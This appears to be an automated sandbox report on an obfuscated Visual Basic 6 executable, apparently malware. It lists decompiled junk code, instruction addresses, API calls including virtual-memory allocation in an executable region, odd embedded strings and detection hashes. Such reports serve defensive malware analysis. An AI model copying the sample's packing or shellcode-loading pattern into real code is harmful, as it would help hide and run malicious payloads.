					_t70 = _t178 + 0x6f;
					 *_t70 =  *((intOrPtr*)(_t178 + 0x6f)) + _t125;
					if( *_t70 >= 0) {
						L44:
						asm("loope 0xffffffaa");
						asm("aaa");
						asm("stosd");
						 *_t125 =  *_t125 + _t125;
						 *_t125 =  *_t125 + _t125;
						 *_t125 =  *_t125 + _t125;
						 *_t125 =  *_t125 + _t125;
						goto L45;
					} else {
						_t178 = _t178 + 1;
						asm("outsd");
						if(_t178 >= 0) {
							L45:
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t168 =  *_t168 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *_t125 =  *_t125 + _t125;
							 *((intOrPtr*)(_t159 + 0x147)) =  *((intOrPtr*)(_t159 + 0x147)) + _t159;
							 *_t125 =  *_t125 + _t125;
							asm("das");
							_t127 = _t125 + _t172 + 1;
							 *((intOrPtr*)(_t127 + _t127 + 0x500000)) =  *((intOrPtr*)(_t127 + _t127 + 0x500000)) + _t159;
						} else {
							 *_t125 =  *_t125 + _t172;
							 *_t125 =  *_t125 + _t125;
							_t138 = _t125 | 0x67525b93;
							asm("sbb [edx+0x739d8f45], dh");
							asm("fisttp dword [ebp-0x2c]");
							_push(_t168);
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							asm("adc [esi], al");
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							_t139 = _t138 +  *_t138;
							 *_t139 =  *_t139 + _t139;
							 *_t139 =  *_t139 + _t139;
							_t140 = _t139 + _t139;
							asm("adc eax, 0x4c0040");
							 *_t140 =  *_t140 + _t140;
							_push(_t140);
							 *_t140 =  *_t140 + _t140;
							 *((intOrPtr*)(_t140 - 0x2f)) =  *((intOrPtr*)(_t140 - 0x2f)) + _t168 - 1;
							asm("adc al, 0x91");
							_t168 = 0xa1;
							asm("lodsb");
							_t127 = _t188 + 1;
							if(_t140 + 1 >= 0) {
								asm("std");
								goto L44;
							}
						}
					}
					_push(_t127);
					 *_t127 =  *_t127 + _t127;
					_t160 = _t159 + _t168;
					asm("fnsave [ebp-0x10]");
					_t128 = _t172;
					_t173 = _t127;
					_t170 =  *((intOrPtr*)(_t178 - 0x24));
					asm("aad 0x4a");
					asm("adc [eax], al");
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t173 =  *_t173 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t170;
					 *_t128 =  *_t128 + _t128;
					 *((intOrPtr*)(_t128 + 0x2f)) =  *((intOrPtr*)(_t128 + 0x2f)) + _t170;
					_t130 = _t128 + 1 + _t170;
					 *_t130 =  *_t130 + _t130;
					 *_t170 =  *_t170 + _t130;
					 *_t173 =  *_t173 + _t130;
					 *((intOrPtr*)(_t186 - 1 + 0x40)) =  *((intOrPtr*)(_t186 - 1 + 0x40)) + _t173;
					 *_t130 =  *_t130 + _t130;
					 *_t130 =  *_t130 + _t130;
					 *((intOrPtr*)(_t170 + 0x41 + _t178 * 2)) =  *((intOrPtr*)(_t170 + 0x41 + _t178 * 2)) + _t160;
					_t161 = _t160 + _t160;
					asm("invalid");
					 *_t130 =  *_t130 + 1;
					 *_t130 =  *_t130 + _t130;
					 *_t130 =  *_t130 + _t170;
					_t131 = _t130 + 1;
					 *_t131 =  *_t131 + _t173;
					asm("rol byte [ecx], 0x0");
					 *_t131 =  *_t131 + _t131;
					 *((intOrPtr*)(_t131 + 0x29ce)) =  *((intOrPtr*)(_t131 + 0x29ce)) + _t131;
					 *_t131 =  *_t131 + _t131;
					 *_t131 =  *_t131 + _t131;
					 *_t131 =  *_t131 + _t131;
					 *_t131 =  *_t131 + _t131;
					 *_t131 =  *_t131 + _t131;
					 *((intOrPtr*)(_t173 + _t161)) =  *((intOrPtr*)(_t173 + _t161)) + _t173;
					_t132 = _t131 + 1;
					 *_t170 =  *_t170 + _t132;
					 *_t132 =  *_t132 + _t132;
					 *_t132 =  *_t132 + _t161;
					asm("das");
					_t133 = _t132 + 1;
					 *_t133 =  *_t133 + _t133;
					 *_t133 =  *_t133 + _t133;
					 *((intOrPtr*)(_t173 + _t161)) =  *((intOrPtr*)(_t173 + _t161)) + _t173;
					_t134 = _t133 + 1;
					 *_t170 =  *_t170 + _t134;
					 *_t134 =  *_t134 + _t134;
					 *((intOrPtr*)(_t173 + _t161)) =  *((intOrPtr*)(_t173 + _t161)) + _t161;
					_t135 = _t134 + 1;
					 *_t135 =  *_t135 + _t135;
					 *_t135 =  *_t135 + _t135;
					 *_t135 =  *_t135 + _t161;
					asm("sbb al, [eax]");
					 *_t135 =  *_t135 + _t135;
					 *_t135 =  *_t135 + _t135;
					_t136 = _t135 + 1;
					 *_t136 =  *_t136 + _t136;
					 *((intOrPtr*)(_t178 + 0x6c006801)) =  *((intOrPtr*)(_t178 + 0x6c006801)) + _t173;
					 *((intOrPtr*)(_t173 + _t161 + 0x40)) =  *((intOrPtr*)(_t173 + _t161 + 0x40)) + _t136;
					return _t136 + _t170;
				}
				_t16 = _t172 + 0x65;
				 *_t16 =  *((intOrPtr*)(_t172 + 0x65)) + _t110;
				_t200 =  *_t16;
				if (_t200 >= 0) goto L15;
				goto L7;
			}

0x00401574
0x00401574
0x00401574
0x00401574
0x00401574
0x00401579
0x0040157e
0x00401580
0x00401582
0x00401584
0x00401586
0x00401588
0x00401589
0x0040158b
0x0040158d
0x0040158f
0x00401592
0x00401599
0x004015a1
0x004015a3
0x004015a5
0x004015a7
0x004015a9
0x004015ab
0x004015ae
0x004015b0
0x004015b0
0x004015b1
0x004015b2
0x00000000
0x00000000
0x004015b4
0x004015bb
0x004015bd
0x004015bf
0x004015c1
0x004015c5
0x004015c6
0x004015c8
0x004015ca
0x004015cb
0x004015cc
0x004015cd
0x004015d2
0x004015d3
0x00000000
0x004015d5
0x004015d5
0x004015d6
0x004015d8
0x004015d9
0x004015da
0x004015dc
0x004015de
0x004015df
0x004015e0
0x004015e1
0x004015e1
0x004015e1
0x004015ec
0x004015ed
0x004015ee
0x004015f0
0x004015f6
0x004015f7
0x004015fd
0x004015ff
0x00401601
0x00401603
0x00401605
0x00401607
0x00401609
0x0040160b
0x0040160d
0x0040160f
0x00401611
0x00401613
0x00401615
0x00401617
0x00401619
0x0040161b
0x0040161d
0x00401620
0x00401623
0x00401625
0x00000000
0x00401625
0x004015da
0x0040162c
0x0040162c
0x0040169f
0x004016a1
0x004016a3
0x004016a5
0x004016a6
0x004016a6
0x004016aa
0x004016de
0x004016de
0x004016e1
0x004016e3
0x004016e5
0x004016eb
0x004016f0
0x004016f2
0x004016f4
0x004016f6
0x004016f7
0x004016fa
0x004016fc
0x004016fe
0x004016ff
0x00401703
0x00401704
0x00401705
0x00401706
0x00401708
0x0040170b
0x0040170d
0x0040170f
0x00401711
0x00401713
0x00401714
0x00401715
0x00401716
0x00401717
0x00401718
0x00401719
0x0040171c
0x0040171e
0x0040171f
0x0040171f
0x00401722
0x00401723
0x00401723
0x00401724
0x004016ad
0x004016ad
0x004016af
0x004016b0
0x004016b1
0x004016b2
0x004016b6
0x004016b8
0x004016ba
0x004016bc
0x004016be
0x004016be
0x004016be
0x004016c2
0x004016c3
0x0040173a
0x0040173f
0x00401772
0x00401772
0x00401773
0x00401774
0x00401778
0x00401779
0x0040177b
0x0040177d
0x0040177f
0x00401781
0x00401786
0x00401788
0x0040178a
0x0040178c
0x0040178d
0x00401791
0x00401793
0x00401799
0x0040179c
0x0040179e
0x004017a0
0x004017a2
0x004017a4
0x004017a6
0x004017a6
0x004017a9
0x004017aa
0x00000000
0x004017ac
0x004017ac
0x004017af
0x004017b1
0x004017b2
0x004017b6
0x004017b9
0x004017bb
0x004017bd
0x004017bf
0x00000000
0x004017bf
0x00401741
0x00401741
0x00401745
0x00401746
0x0040174a
0x0040174b
0x0040174d
0x0040174d
0x00401752
0x004017c0
0x004017c0
0x004017c4
0x004017c6
0x004017c8
0x004017ca
0x004017cb
0x004017ce
0x004017cf
0x004017d0
0x004017d8
0x004017df
0x004017e1
0x004017e3
0x004017e7
0x004017eb
0x004017ed
0x004017ef
0x004017f1
0x004017f1
0x004017f3
0x004017f4
0x004017f9
0x004017fb
0x004017fd
0x00401803
0x00401808
0x00401809
0x0040180b
0x0040180e
0x00401810
0x00401811
0x00401811
0x00401813
0x00401815
0x00401817
0x00401819
0x0040181b
0x0040181e
0x0040181f
0x00401821
0x00401823
0x00401825
0x00401828
0x00401829
0x0040182b
0x0040182f
0x0040182f
0x00401831
0x00401832
0x00401837
0x00401839
0x0040183b
0x0040183d
0x0040183f
0x00401841
0x00401843
0x00401846
0x00401848
0x0040184a
0x0040184c
0x0040184e
0x00401850
0x00401852
0x00401854
0x00401857
0x00401859
0x0040185b
0x0040185d
0x0040185f
0x00401862
0x00401863
0x00401865
0x00401866
0x00401754
0x00401754
0x00401755
0x00401758
0x0040175d
0x00401761
0x00401763
0x00401765
0x00401767
0x00401768
0x0040176b
0x0040176c
0x00401770
0x00000000
0x00401770
0x00401752
0x004016c6
0x004016c6
0x004016c7
0x004016c9
0x004016cb
0x004016cc
0x004016cd
0x004016cf
0x004016d0
0x004016d1
0x004016d3
0x004016d5
0x004016d6
0x004016d8
0x004016d8
0x00000000
0x004016d8
0x004016c3
0x0040162d
0x0040162d
0x0040162d
0x00401868
0x0040186a
0x0040186c
0x0040186e
0x00401870
0x00401872
0x00401874
0x00401876
0x00401878
0x0040187d
0x00401880
0x00401882
0x00401883
0x00401889
0x0040188b
0x00401891
0x00401893
0x00401899
0x0040189b
0x0040189d
0x0040189f
0x004018a1
0x004018a3
0x004018a5
0x004018a7
0x004018aa
0x004018ac
0x004018ad
0x004018af
0x004018b0
0x004018b1
0x004018b2
0x004018b3
0x004018b4
0x004018b4
0x004018b7
0x0040192c
0x0040192c
0x0040192e
0x0040192f
0x00401930
0x00401932
0x00401934
0x00401936
0x00000000
0x004018b9
0x004018c0
0x004018c1
0x004018c2
0x00401937
0x00401937
0x00401939
0x0040193b
0x0040193d
0x0040193f
0x00401941
0x00401943
0x00401945
0x00401947
0x00401949
0x0040194b
0x0040194d
0x0040194f
0x00401951
0x00401953
0x00401955
0x00401957
0x00401959
0x0040195b
0x00401961
0x00401965
0x00401966
0x00401967
0x004018c4
0x004018cb
0x004018ce
0x004018d0
0x004018d5
0x004018db
0x004018de
0x004018e0
0x004018e2
0x004018e4
0x004018e6
0x004018e8
0x004018ea
0x004018ec
0x004018ee
0x004018f0
0x004018f2
0x004018f4
0x004018f6
0x004018f8
0x004018fa
0x004018fc
0x004018fe
0x00401900
0x00401902
0x00401904
0x00401906
0x00401908
0x0040190a
0x0040190d
0x0040190f
0x00401911
0x00401913
0x00401915
0x0040191a
0x0040191c
0x0040191d
0x0040191f
0x00401922
0x00401924
0x00401926
0x00401928
0x00401929
0x0040192b
0x00000000
0x0040192b
0x00401929
0x004018c2
0x0040196c
0x0040196d
0x0040196f
0x00401971
0x00401978
0x00401978
0x0040197a
0x0040197d
0x0040197f
0x00401981
0x00401983
0x00401985
0x00401987
0x00401989
0x0040198b
0x0040198d
0x0040198f
0x00401991
0x00401993
0x00401995
0x00401997
0x00401999
0x0040199b
0x0040199d
0x0040199f
0x004019a1
0x004019a3
0x004019a5
0x004019a7
0x004019a9
0x004019ab
0x004019b1
0x004019b3
0x004019b7
0x004019b9
0x004019bb
0x004019bd
0x004019bf
0x004019c3
0x004019c5
0x004019c7
0x004019cb
0x004019cd
0x004019cf
0x004019d1
0x004019d3
0x004019d5
0x004019d7
0x004019d9
0x004019dd
0x004019df
0x004019e5
0x004019e7
0x004019e9
0x004019eb
0x004019ed
0x004019ef
0x004019f2
0x004019f3
0x004019f5
0x004019f7
0x004019f9
0x004019fa
0x004019fb
0x004019fd
0x004019ff
0x00401a02
0x00401a03
0x00401a05
0x00401a07
0x00401a0a
0x00401a0b
0x00401a0d
0x00401a0f
0x00401a11
0x00401a14
0x00401a16
0x00401a1a
0x00401a1b
0x00401a1d
0x00401a23
0x00401a29
0x00401a29
0x00401627
0x00401627
0x00401627
0x0040162a
0x00000000

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401579

Strings

VB5!6&*, xrefs: 00401574

Memory Dump Source

Source File: 00000006.00000002.711109290.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.711100996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.711126197.000000000041C000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.711146971.000000000041E000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 30bf338e35427a2a8a984c9bea90d66cd68f041bcf425dd9e1b093e21119c803
Instruction ID: 49687d28f7ac8d70c6b72b6408bc73b14a1e75a332597d99eb1c4f1bebf1d49e
Opcode Fuzzy Hash: 30bf338e35427a2a8a984c9bea90d66cd68f041bcf425dd9e1b093e21119c803
Instruction Fuzzy Hash: 59A1886244E3C18FD7138BB44DA55A23FB0AE2322071E09EBC4C1CF0B3D22D5A5AD766

Uniqueness

Uniqueness Score: -1.00%

Function 003C7129, Relevance: 1.6, APIs: 1, Instructions: 118memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 003C730E

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 58ef704f49a9a4bedc93640cab8b43ab5b2aa92e2b7d63f4daf9e87689c70647
Instruction ID: ef81c0d80c48190e741e6357d9f39bdbcd92db2185fd8bc1316cd49b4f8afdc6
Opcode Fuzzy Hash: 58ef704f49a9a4bedc93640cab8b43ab5b2aa92e2b7d63f4daf9e87689c70647
Instruction Fuzzy Hash: D641F1751043499FDB719E29DC96BEB3BA9EF19350F06441DEC89EB610E3318A82CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003C7191, Relevance: 1.6, APIs: 1, Instructions: 109memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 003C730E

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 4d19044ba863bd562ad7fd8af22371803cb19a1bc3c00c277e45d5fb0bbd0490
Instruction ID: b7b98a97ff7cc024ebcdb4b05894803ac41dc5f4653abd43eb41ae0ae95126f3
Opcode Fuzzy Hash: 4d19044ba863bd562ad7fd8af22371803cb19a1bc3c00c277e45d5fb0bbd0490
Instruction Fuzzy Hash: E241DC751043499BDB709E39DC96BEA3BA5EF19350F064429ECC9EB210E3318A82CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003C71FD, Relevance: 1.6, APIs: 1, Instructions: 106memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 003C730E

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 44c332f4cba6b91e860aa111797797dcf49cb9c7c694dc0c088827f32d120f9b
Instruction ID: 9a944dba08509d958ce64b5d6a38d8e454687cd90eee4f08dea8a9ca156e42ca
Opcode Fuzzy Hash: 44c332f4cba6b91e860aa111797797dcf49cb9c7c694dc0c088827f32d120f9b
Instruction Fuzzy Hash: 7641F3755443499BEB30DE29DC85BEA3BB9EF29350F45442EEC8DDB200E3318A42CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003C728D, Relevance: 1.6, APIs: 1, Instructions: 71memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 003C730E

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b6a93f7e1f476cce45d833a859739492d3cca7c2497c76d0462ae37a7aaae0c2
Instruction ID: 83ba33fd80e1ed80b6df465cc2edc0b0518b71ce52d203a181849b1072c5b449
Opcode Fuzzy Hash: b6a93f7e1f476cce45d833a859739492d3cca7c2497c76d0462ae37a7aaae0c2
Instruction Fuzzy Hash: A121B0755043899FEB71CF298C81BDA37AAFF68750F05452DEC8DDB214E7318A428B51

Uniqueness

Uniqueness Score: -1.00%

Function 00417B40, Relevance: 249.2, APIs: 130, Strings: 12, Instructions: 728COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,00402B5C,00000002), ref: 00417BF9
__vbaAryConstruct2.MSVBVM60(?,00402B78,00000011), ref: 00417C06
__vbaNew2.MSVBVM60(004029C4,0041C3C8), ref: 00417C1A
__vbaHresultCheckObj.MSVBVM60(00000000,0261F8CC,004029B4,00000014), ref: 00417C42
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029D4,00000138), ref: 00417C72
__vbaFreeObj.MSVBVM60 ref: 00417C7E
__vbaNew2.MSVBVM60(004029C4,0041C3C8), ref: 00417C96
__vbaHresultCheckObj.MSVBVM60(00000000,0261F8CC,004029B4,00000014), ref: 00417CC4
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029D4,00000068), ref: 00417CFC
__vbaFreeObj.MSVBVM60 ref: 00417D04
__vbaVarDup.MSVBVM60 ref: 00417D2A
#564.MSVBVM60(?,?), ref: 00417D3E
__vbaHresultCheck.MSVBVM60(00000000), ref: 00417D49
__vbaVarTstNe.MSVBVM60(?,?), ref: 00417D71
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00417D8E
#690.MSVBVM60(UNABSOLVABLE,KOMMANDOSEKVENS,epiplasmic,troen), ref: 00417DB8
__vbaUI1I2.MSVBVM60 ref: 00417DC9
__vbaUI1I2.MSVBVM60 ref: 00417DD5
__vbaUI1I2.MSVBVM60 ref: 00417DE2
__vbaUI1I2.MSVBVM60 ref: 00417DEF
__vbaUI1I2.MSVBVM60 ref: 00417DFC
__vbaUI1I2.MSVBVM60 ref: 00417E09
__vbaUI1I2.MSVBVM60 ref: 00417E16
__vbaUI1I2.MSVBVM60 ref: 00417E23
__vbaUI1I2.MSVBVM60 ref: 00417E30
__vbaUI1I2.MSVBVM60 ref: 00417E3D
__vbaUI1I2.MSVBVM60 ref: 00417E4A
__vbaUI1I2.MSVBVM60 ref: 00417E57
__vbaUI1I2.MSVBVM60 ref: 00417E64
__vbaUI1I2.MSVBVM60 ref: 00417E71
__vbaUI1I2.MSVBVM60 ref: 00417E7E
__vbaUI1I2.MSVBVM60 ref: 00417E8B
__vbaUI1I2.MSVBVM60 ref: 00417E98
__vbaUI1I2.MSVBVM60 ref: 00417EA5
__vbaUI1I2.MSVBVM60 ref: 00417EB2
__vbaUI1I2.MSVBVM60 ref: 00417EBF
__vbaUI1I2.MSVBVM60 ref: 00417ECC
__vbaUI1I2.MSVBVM60 ref: 00417ED9
__vbaUI1I2.MSVBVM60 ref: 00417EE6
__vbaUI1I2.MSVBVM60 ref: 00417EF3
__vbaUI1I2.MSVBVM60 ref: 00417F00
__vbaUI1I2.MSVBVM60 ref: 00417F0D
__vbaUI1I2.MSVBVM60 ref: 00417F1A
__vbaUI1I2.MSVBVM60 ref: 00417F27
__vbaUI1I2.MSVBVM60 ref: 00417F34
__vbaUI1I2.MSVBVM60 ref: 00417F41
__vbaUI1I2.MSVBVM60 ref: 00417F4E
__vbaUI1I2.MSVBVM60 ref: 00417F5B
__vbaUI1I2.MSVBVM60 ref: 00417F68
__vbaUI1I2.MSVBVM60 ref: 00417F75
__vbaUI1I2.MSVBVM60 ref: 00417F82
__vbaUI1I2.MSVBVM60 ref: 00417F8F
__vbaUI1I2.MSVBVM60 ref: 00417F9C
__vbaUI1I2.MSVBVM60 ref: 00417FA9
__vbaUI1I2.MSVBVM60 ref: 00417FB6
__vbaUI1I2.MSVBVM60 ref: 00417FC3
__vbaUI1I2.MSVBVM60 ref: 00417FCD
__vbaUI1I2.MSVBVM60 ref: 00417FDA
__vbaUI1I2.MSVBVM60 ref: 00417FE7
__vbaUI1I2.MSVBVM60 ref: 00417FF4
__vbaUI1I2.MSVBVM60 ref: 00418001
__vbaUI1I2.MSVBVM60 ref: 0041800E
__vbaUI1I2.MSVBVM60 ref: 0041801B
__vbaUI1I2.MSVBVM60 ref: 00418028
__vbaUI1I2.MSVBVM60 ref: 00418035
__vbaUI1I2.MSVBVM60 ref: 00418042
__vbaUI1I2.MSVBVM60 ref: 0041804F
__vbaUI1I2.MSVBVM60 ref: 0041805C
__vbaUI1I2.MSVBVM60 ref: 00418069
__vbaUI1I2.MSVBVM60 ref: 00418076
__vbaUI1I2.MSVBVM60 ref: 00418083
__vbaUI1I2.MSVBVM60 ref: 00418090
__vbaUI1I2.MSVBVM60 ref: 0041809D
__vbaUI1I2.MSVBVM60 ref: 004180AA
__vbaUI1I2.MSVBVM60 ref: 004180B7
__vbaUI1I2.MSVBVM60 ref: 004180C4
__vbaUI1I2.MSVBVM60 ref: 004180D1
__vbaUI1I2.MSVBVM60 ref: 004180DE
__vbaUI1I2.MSVBVM60 ref: 004180EB
__vbaUI1I2.MSVBVM60 ref: 004180F8
__vbaUI1I2.MSVBVM60 ref: 00418105
__vbaUI1I2.MSVBVM60 ref: 00418112
__vbaUI1I2.MSVBVM60 ref: 0041811F
__vbaUI1I2.MSVBVM60 ref: 0041812C
__vbaUI1I2.MSVBVM60 ref: 00418139
__vbaUI1I2.MSVBVM60 ref: 00418146
__vbaUI1I2.MSVBVM60 ref: 00418153
__vbaUI1I2.MSVBVM60 ref: 00418160
__vbaUI1I2.MSVBVM60 ref: 0041816D
__vbaUI1I2.MSVBVM60 ref: 0041817A
__vbaUI1I2.MSVBVM60 ref: 00418187
__vbaUI1I2.MSVBVM60 ref: 00418194
__vbaUI1I2.MSVBVM60 ref: 004181A1
__vbaUI1I2.MSVBVM60 ref: 004181AE
__vbaUI1I2.MSVBVM60 ref: 004181BB
__vbaUI1I2.MSVBVM60 ref: 004181C8
__vbaUI1I2.MSVBVM60 ref: 004181D5
__vbaUI1I2.MSVBVM60 ref: 004181E2
__vbaUI1I2.MSVBVM60 ref: 004181EF
__vbaUI1I2.MSVBVM60 ref: 004181FC
__vbaUI1I2.MSVBVM60 ref: 00418209
__vbaUI1I2.MSVBVM60 ref: 00418216
__vbaUI1I2.MSVBVM60 ref: 00418223
__vbaUI1I2.MSVBVM60 ref: 00418230
__vbaUI1I2.MSVBVM60 ref: 0041823D
__vbaUI1I2.MSVBVM60 ref: 0041824A
__vbaUI1I2.MSVBVM60 ref: 00418257
__vbaUI1I2.MSVBVM60 ref: 00418264
__vbaUI1I2.MSVBVM60 ref: 00418271
__vbaUI1I2.MSVBVM60 ref: 0041827E
__vbaUI1I2.MSVBVM60 ref: 0041828B
__vbaUI1I2.MSVBVM60 ref: 00418298
__vbaUI1I2.MSVBVM60 ref: 004182A5
__vbaUI1I2.MSVBVM60 ref: 004182B2
__vbaNew2.MSVBVM60(004029C4,0041C3C8), ref: 004182CC
__vbaHresultCheckObj.MSVBVM60(00000000,0261F8CC,004029B4,0000001C), ref: 004182F4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402A5C,00000050), ref: 00418317
__vbaFreeObj.MSVBVM60 ref: 00418323
__vbaHresultCheckObj.MSVBVM60(00000000,00401130,004026D8,000006F8), ref: 00418365
__vbaStrCopy.MSVBVM60 ref: 00418386
__vbaHresultCheckObj.MSVBVM60(00000000,00401130,004026D8,000006FC), ref: 004183D3
__vbaFreeStr.MSVBVM60 ref: 004183DB
__vbaStrCopy.MSVBVM60 ref: 00418414
__vbaHresultCheckObj.MSVBVM60(00000000,00401130,004026D8,00000700), ref: 00418460
__vbaFreeStr.MSVBVM60 ref: 00418468
__vbaHresultCheckObj.MSVBVM60(00000000,00401130,004026D8,00000704), ref: 004184B0
__vbaHresultCheckObj.MSVBVM60(00000000,00401130,004026A8,000002B4), ref: 004184CD
__vbaVarAdd.MSVBVM60(?,00000008,?), ref: 00418507
__vbaVarMove.MSVBVM60 ref: 0041850E
__vbaVarTstLt.MSVBVM60(00000003,?), ref: 0041852F

Strings

epiplasmic, xrefs: 00417DA9
c(, xrefs: 00418345
KOMMANDOSEKVENS, xrefs: 00417DAE
9E,, xrefs: 0041837C
Ths, xrefs: 00417C52
ELIMINERINGERNES, xrefs: 00418367
Toatoa, xrefs: 004183E1
troen, xrefs: 00417DA4
KVINDESAGERS, xrefs: 00418338
UNABSOLVABLE, xrefs: 00417DB3
`Eg9E,, xrefs: 0041838E, 00418394
Carboxylate9, xrefs: 00418423

Memory Dump Source

Source File: 00000006.00000002.711109290.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.711100996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.711126197.000000000041C000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.711146971.000000000041E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$Construct2Copy$#564#690ListMove
String ID: 9E,$Carboxylate9$ELIMINERINGERNES$KOMMANDOSEKVENS$KVINDESAGERS$Ths$Toatoa$UNABSOLVABLE$`Eg9E,$c($epiplasmic$troen
API String ID: 3808567424-1709419087
Opcode ID: 601035f08edfff34c21d0006d42d09735d7f8d163c0cb49d95af971ebd2adfa8
Instruction ID: f745a280b9ad02211260afd9160ae7aed7901a8b98dde121c0636eb635d2e0ea
Opcode Fuzzy Hash: 601035f08edfff34c21d0006d42d09735d7f8d163c0cb49d95af971ebd2adfa8
Instruction Fuzzy Hash: 18628230E013989FDB04DBA4C850BADFFBAAF99300F14809FD5596B382CA759945CFA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003C95E4, Relevance: 8.5, Strings: 6, Instructions: 1023COMMON

Download Yara Rule

Strings

<{2, xrefs: 003C653E
Nf}, xrefs: 003C56B6
s~f, xrefs: 003C5688
eZ@, xrefs: 003C5B09
__, xrefs: 003C5DAC
zo3, xrefs: 003C565B

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: <{2$eZ@$s~f$Nf}$__$zo3
API String ID: 0-2342994097
Opcode ID: 1b45e938028ebd43c2710ee864ef42e9268f0b96755d18963e467bb150164a96
Instruction ID: 227cd679a0cbbb513880798863bd03fef10af7e72c218534a7896282e706a9d0
Opcode Fuzzy Hash: 1b45e938028ebd43c2710ee864ef42e9268f0b96755d18963e467bb150164a96
Instruction Fuzzy Hash: 618264726043499FDF319E38CD99BEA77A6BF55350F96412EDC89DB600D3308A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003C2612, Relevance: 8.5, Strings: 6, Instructions: 965COMMON

Download Yara Rule

Strings

<{2, xrefs: 003C653E
Nf}, xrefs: 003C56B6
s~f, xrefs: 003C5688
eZ@, xrefs: 003C5B09
__, xrefs: 003C5DAC
zo3, xrefs: 003C565B

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: <{2$eZ@$s~f$Nf}$__$zo3
API String ID: 2167126740-2342994097
Opcode ID: 9b157297051e3177f4355f108492ea3a1b1cec87f9c5574dd16edb930a7bfa43
Instruction ID: d0876bf0d343644b49f432b18e4bb825b4c32cd155c5478e271003a0c74667ee
Opcode Fuzzy Hash: 9b157297051e3177f4355f108492ea3a1b1cec87f9c5574dd16edb930a7bfa43
